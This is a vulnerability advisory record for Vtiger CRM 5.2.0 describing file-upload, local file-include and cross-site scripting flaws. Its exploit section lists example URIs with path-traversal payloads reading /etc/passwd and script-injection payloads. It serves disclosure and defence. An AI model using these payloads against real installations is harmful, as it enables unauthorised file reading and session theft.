ID

VAR-E-201011-0392


TITLE

Vtiger CRM Multiple Remote Security Vulnerabilities

Trust: 0.3

sources: BID: 44901

DESCRIPTION

Vtiger CRM is prone to an arbitrary-file-upload vulnerability, multiple local file-include vulnerabilities, and multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
Attackers can exploit these issues to upload and execute arbitrary code in the context of the webserver process, view and execute arbitrary local files within the context of the webserver process, steal cookie-based authentication information, execute arbitrary client-side scripts in the context of the browser, and obtain sensitive information. Other attacks are also possible.
Vtiger CRM 5.2.0 is vulnerable; other versions may also be affected.

Trust: 0.3

sources: BID: 44901

AFFECTED PRODUCTS

vendor: vtiger, model: crm, scope: eq, version: 5.2

Trust: 0.3

sources: BID: 44901

EXPLOIT

Attackers can exploit these issues through a browser. To exploit a cross-site scripting vulnerability, an attacker must entice an unsuspecting user to follow a malicious URI.
The following example URIs are available:
http://www.example.com/vtigercrm/phprint.php?lang_crm=/../[..]/../etc/passwd%00&module=a&action=a&activity_mode=
http://www.example.com/vtigercrm/graph.php?current_language=/../[..]/../etc/passwd%00&module=Accounts&action=Import&parenttab=Support
http://www.example.com/vtigercrm/index.php?module=Users&action=Login&default_user_name=%22%20onmouseover=%22javascript:alert('XSS');
http://www.example.com/vtigercrm/index.php?module=Settings&action=GetFieldInfo&label=%3Cscript%3Ealert(123)%3C/scrip%3E

Trust: 0.3

sources: BID: 44901

PRICE

Free

Trust: 0.3

sources: BID: 44901

TYPE

Input Validation Error

Trust: 0.3

sources: BID: 44901

CREDITS

Giovanni and Alessandro

Trust: 0.3

sources: BID: 44901

EXTERNAL IDS

db: BID, id: 44901

Trust: 0.3

sources: BID: 44901

REFERENCES

url: http://www.vtiger.com/index.php

Trust: 0.3

url: http://www.ush.it/team/ush/hack-vtigercrm_520/vtigercrm_520.txt

Trust: 0.3

sources: BID: 44901

SOURCES

db: BID, id: 44901

LAST UPDATE DATE

2022-07-27T09:38:24.111000+00:00


SOURCES UPDATE DATE

db: BID, id: 44901, date: 2010-11-17T00:00:00

SOURCES RELEASE DATE

db: BID, id: 44901, date: 2010-11-17T00:00:00